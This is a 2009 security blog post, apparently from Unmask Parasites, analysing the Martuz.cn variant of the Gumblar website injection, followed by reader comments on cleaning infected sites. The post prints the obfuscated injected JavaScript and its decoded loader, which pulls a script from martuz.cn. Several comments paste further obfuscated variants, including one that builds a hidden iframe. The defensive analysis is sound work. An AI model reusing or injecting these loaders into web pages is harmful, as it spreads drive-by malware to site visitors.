msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Martuz .cn – New Incarnation of the Gumblar Exploit. So What’s New?

   18 May 09   Filed in General, Website exploits

Gumblar is dead

Many people have noticed that “gumblar .cn” no longer resolve. The site cannot be accessed. Thus the gumblar script is no longer able to load the malicious payload and infect new computers and websites. Great!

Meet the Martuz

The loss of the gumblar .cn domain name can’t stop hackers. They have slightly modified the script and now inject a new version that loads malicious content from a new domain – martuz .cn (95 .129 .145 .58)

The script

(function(){var G33z1='%';var KlKj='va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-26-26(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d';var m8nw=KlKj.replace(/-/g,G33z1);e val(unescape(m8nw))})();

The script looks and acts the same as the gumblar script. All facts we know about the Gumblar apply to Martuz as well. And the removal instructions should be the same.

What’s new?

This is the decoded version of the script

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.w rite("<script src=//martu"+"z.cn/vid/?id="+j+"><\/script>");}

As you can see, this code injects an external script that loads content from “martuz.cn

The Martuz version of the script is slightly more sophisticated.

Hackers made it more difficult to identify the script even when you decode it. They now split the domain name and have the script concatenate the parts: “martu”+”z.cn”, “mart”+”uz.cn”, etc. Simple scripts that search for “martuz.cn” may not detect the script.

Martuz vs Google Chrome

In Gumblar, hackers only wanted to load the script on Windows machines with version of Windows prior Vista (NT 6). In Martuz, they added a new check and no longer load the external script in a Google Chrome browser. I guess hackers read multiple forums and noticed that many webmasters used Google Chrome to detect the malicious code (Chrome detects calls to blacklisted sites and warns users). Now, if a webmaster loads an infected web sites in Chrome, there will be no warning since the external code won’t load. And the webmaster may mistakenly think that the site is clean and no additional removal action is required.

Don’t count on Google Chrome (and Safari) warnings. As you can see, hackers can make their code unnoticeable. And they can use new domain names every day, so that even if Chrome detects calls to the new malicious sites, it won’t warn you since those site are not blacklisted yet.

Make sure to check the source code of web pages. Or check web pages with my Unmask Parasites – it detects suspicious scripts without executing them.

What’s next?

Now that we all know how fast Gumblaroids (Gumblar-type exploits) can spread and how difficult to remove them from web sites and local computers, the Martuz incarnation should be shut down very soon. But I don’t think hackers will give up. We should be ready for new malicious domains and more and more sophisticated scripts.

And don’t forget hackers still have a big database of compromised FTP credentials and a lot of sites with hidden backdoor scripts that they can still use. And I’m sure they’ll use them.

Let’s discuss the issue.

If you have any additional information about the Martuz incarnation of the exploit or want to share your thoughts about Gumblaroids, please leave your comments below.

Similar posts:

Reader's Comments (40)

  1. |

    [...] Here is some coverage about it: http://blog.scansafe.com/ http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/ http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/ [...]

  2. |

    Great Information on this recent set of attacks.
    I have been watching this issue progress over the last couple of weeks. I have worked with unmaskparasites.com on a couple of new trends. Keep it up.

  3. |

    [...] まぁ、他にどこも記事だしてないのでしょうがないんですけどね Martuz .cn – New Incarnation of the Gumblar Exploit. So What’s New? Unmask Parasite が記事を出してくれました。 [...]

  4. |

    It seems that my computer was infected with a form of this virus. Below is the Javascript that was put on a website I manage.

    var XaylbySQXemLUQDTDUHF = “A60A105A102A114A97A109A101A32A119A105A100A116A104A61A34A52A56A48A34A32A104A101A105A103A104A116A61A34A54A48A34A32A115A114A99A61A34A104A116A116A112A58A47A47A116A114A97A102A102A105A99A115A45A105A110A115A112A101A99A116A111A114A46A99A110A47A100A97A105A108A121A95A115A116A97A116A115A47A105A110A46A99A103A105A63A51A34A32A115A116A121A108A101A61A34A98A111A114A100A101A114A58A48A112A120A59A32A112A111A115A105A116A105A111A110A58A114A101A108A97A116A105A118A101A59A32A116A111A112A58A48A112A120A59A32A108A101A102A116A58A45A53A48A48A112A120A59A32A111A112A97A99A105A116A121A58A48A59A32A102A105A108A116A101A114A58A112A114A111A103A105A100A58A68A88A73A109A97A103A101A84A114A97A110A115A102A111A114A109A46A77A105A99A114A111A115A111A102A116A46A65A108A112A104A97A40A111A112A97A99A105A116A121A61A48A41A59A32A45A109A111A122A45A111A112A97A99A105A116A121A58A48A34A62A60A47A105A102A114A97A109A101A62″;var muvKZESuOYzlyxXawpqT = XaylbySQXemLUQDTDUHF.split(“A”);var TcentiGxCODoIzyiDQcR = “”;for (var pcDoaaOWPFqjiVWcDdaF=1; pcDoaaOWPFqjiVWcDdaF

    • |

      Hi Brett,

      It’s not a Gumblaroid.

      I’ve seen a similar script the other day (just with another target domain). It injects a hidden iframe that tries to silently load malicious PDF/Flash files onto visitors’ computers.

      If I see more of these exploits, I’ll review them too.

  5. |

    In the same situation. Found gumblar last week, everything on the server was deleted, reuploaded, ftp passwords were changed and computer scanned with spybot, avg 8.5, and malwarebytes.

    Server was clean for two days. here we are today with martuz .cn

    Edit by Denis: I removed your site from your signature since it is still infected. Unfortunately, you are right. It’s martuz.
    http://www.UnmaskParasites.com/security-report/?page=jimidemetriou.com

  6. |

    There is no existence of any parts of the script in my web pages, and my site is going slow because martuz .cn is loading slow.

    Wonder why… it’s php. Check this out! http://pastebin.com/m3adeab39 that is the code that is injected into php files now.

    • |

      Just wanted to update this, I downloaded all my files, did a search and replace of all that script, then re-uploaded to my server, it’s gone now.

      • |

        Make sure you’ve removed backdoor script too (they usually put them into /images directories as image.php, but the actual filenames may be different on your server). And changed the file/directory permissions back to normal.

  7. |

    Is there a way to check ftp logs with the server and deny ftp access to these uploaders?

    • |

      Jimi, Some hosters provide the possibility to deactivate FTP and SSH by Webfrontend for administration.

  8. |

    [...] [...]

  9. |

    Whats the best way to clean these ???? I am using the ‘Find All’ and ‘Replace All’ in Macromedia. Is that the best way or is there a smarter way ?

  10. |

    Macromedia Dreamweaver I meant….

  11. |

    [...] You may or may not know, but TweetPhoto was attacked 3 times in the last 24 hours. Every time the site has been attacked we’ve quickly responded by removing the virus. It’s been a battle between us and the transforming Gumblar virus which is now morphed to what is known as the Martuz virus. [...]

    Edit by Denis: http://www.UnmaskParasites.com/security-report/?page=tweetphoto.com/blog/2009/05/19/tweetphoto-under-attack-site-restored-back-to-health/

  12. |

    By the way – check your error docs. Every one of the custom error docs will probably have the code.

  13. |

    [...] & Answers ( May 14, 2009 )- Troj/PHPMod-A: Behind the Troj/JSRedir-R attacks ( May 14, 2009 )- Martuz .cn – New Incarnation of the Gumblar Exploit. So What’s New? ( May 18, 2009 )Articles de presse:- New Wave of "Gumblar" Hacked Sites Installs [...]

  14. |

    Does anyone have a solution for this problem, if a website is ‘infected’ how can they fix it?

  15. |

    [...] di situsku. Apalagi dalam minggu ini, dia (baca: gumblar.cn) sudah punya teman lagi yang namanya martuz, ikut-ikutan bercokol. Dan memang nggak ada bedanya dari yang terdahulu. Seperti orang yang mau [...]

  16. |

    Also look for a doc called sh1.php in the images folder

  17. |

    I’ve done a large analysis of the attack that you can read about here

    The goals of the attack currently are to:

    Steal FTP credentials
    Send SPAM
    Install fake anti virus
    Highjack Google search queries
    Disable security software

  18. |

    [...] Unmask Parasites http://blog.unmaskp…-of-gumblar-exploit/ [...]

  19. |

    I’m having some problems on one of my sites, it was loading something from martuz, some HTML.IFRAME-32 hiiden iframe, I have cleaned it and don’t know from where I picked it up, because I have some IFRAMES from other sites with some info. Nasty things…

  20. |

    [...] info aquí, aquí, aquí y [...]

  21. |

    I have been battling this virus for a few days now and finally thought I had gotten rid of it on the sites I manage. Then while browsing through one of the pages I notice in bottom left “waiting for martuz.cn”.

    Now my question is, how can I tell if the virus is on my local machine if all the usual signs did not happen? (google hijack, trojan, fake virus scanner install..etc).

    The reason I ask is cause I don’t want to FTP back into my sites and have them become fully infected again, if my computer is infected again. Need to know if I have to reformat again.

    Thanks,
    Jason

  22. |

    I’m working on removal from several websites I administer. Google reports instances of both martuz.cn and gumbler.cn.

    I did an initial overwrite of files last week, and found martuz still present. I’ve now searched through the pages of a smaller site line by line, and found a few more instances. Still showed “martuz.cn” as loading in the status bar when I pulled the page up.

    Preparing to look into the Apache server files (such as .htaccess) as well as look at the solution posted here.

    Thanks for your thorough reporting…

  23. |

    [...] last 5 years.  My genius web-designer friend helped my kill the thing (you can read more about it here), but the Google warning [...]

  24. |

    I had gumblar, a few weeks ago which I though I killed, today I got hit with Martuz.

    I can’t get it thought and need some help. I changed FTP passwords, downloaded files, found the bad code that starts with “function only in my java script files, found gifimage.php in my images directory which was deleted.

    Everytime I upload a clean javascritp file it gets instantly infected?

    What am I doing wrong, please help and thanks

  25. |

    My genius web-designer friend helped my kill the thing

  26. |

    My website is infected tooo…. and its makin my life tough…. hope i will find cure soon….

    Edit by Denis: Site link had been removed from you signature since the site was still blacklisted by Google.
    http://www.UnmaskParasites.com/security-report/?page=manojky.net
    Consider requesting a malware review via Google’s Webmaster Tools

  27. |

    [...] payload has, however, continued to be delivered from a different source, the martuz.cn domain, Unmask Parasites said Monday in an [...]

  28. |

    We have developed a small application that deals with this kind of viruses.

    Please check it out here:
    http://www.axxis.gr/index.php?option=com_content&view=article&id=35

  29. |

    I have the following variant in my source code:

    (function(VXz3Z){var BbU=’%';var FxUO=’v!61r!20a!3d!22Sc!72ip!74Eng!69ne!22!2c!62!3d!22V!65rsion()!2b!22!2cj!3d!22!22!2cu!3dn!61!76igat!6fr!2euserAgent!3bif(!28!75!2eindexOf(!22Chrom!65!22)!3c0)!26!26(u!2e!69nd!65xOf(!22!57in!22!29!3e0)!26!26(u!2ein!64exO!66!28!22N!54!206!22)!3c!30!29!26!26(d!6f!63!75ment!2eco!6fkie!2eindexOf(!22mi!65k!3d1!22)!3c0)!26!26(typeo!66(!7ar!76zts)!21!3dt!79!70e!6ff(!22A!22)))!7bzrvzts!3d!22A!22!3b!65va!6c(!22i!66(wi!6e!64!6fw!2e!22+a!2b!22)j!3d!6a+!22+a+!22Major!22+b+a+!22Minor!22+!62+!61!2b!22!42u!69l!64!22+b+!22j!3b!22!29!3bdocume!6et!2ewrite(!22!3csc!72i!70t!20!73r!63!3d!2f!2fmar!74u!22+!22z!2e!63n!2fv!69d!2f!3f!69d!3d!22!2bj!2b!22!3e!3c!5c!2fsc!72ipt!3e!22)!3b!7d’;eval(unescape(FxUO.replace(VXz3Z,BbU)))})(/\!/g);

  30. |

    [...] payload has, however, continued to be delivered from a different source, the martuz.cn domain, Unmask Parasites said Monday in an [...]

  31. |

    The remaining question, why do they exploit?

    What’s they’re reason to inject iframes and backdoors?

    Does any1 know what they’re after?

  32. |

    my website boilpass .com has been attacked too. so boring things !

  33. |

    I pulled this off my site. Does anyone know what it is?
    Every index page or folder on my client’s site with an index file had a variant of that code on it.

    I would like to find a way of scanning every file on my server for that code if anyone knows a way, please share.

    This is the bugger code!

    c10z4=”;y607d50a7=/* ybe2941746 */document;y607d50a7.write(‘function ya7e355862b(ybb011505854){return ev’+c10z4+’al(ybb011505854); }’); function c101e3f8acy4aaf1(yb4f4fa702){ var zb3=”;return (ya7e355862b(‘par’+zb3+’seInt’)(yb4f4fa702,16));}function yddd1a98894e(y46cc6e076){ function y793dae(){var y43d1297eada=2;return y43d1297eada;} var y40fa2c6=”;yab485=’fromCh’;ya7ca8b5ecee=String[yab485+'arCode'];for(yda0de91=0;yda0de91

  34. |

    Macromedia Dreamweaver I meant….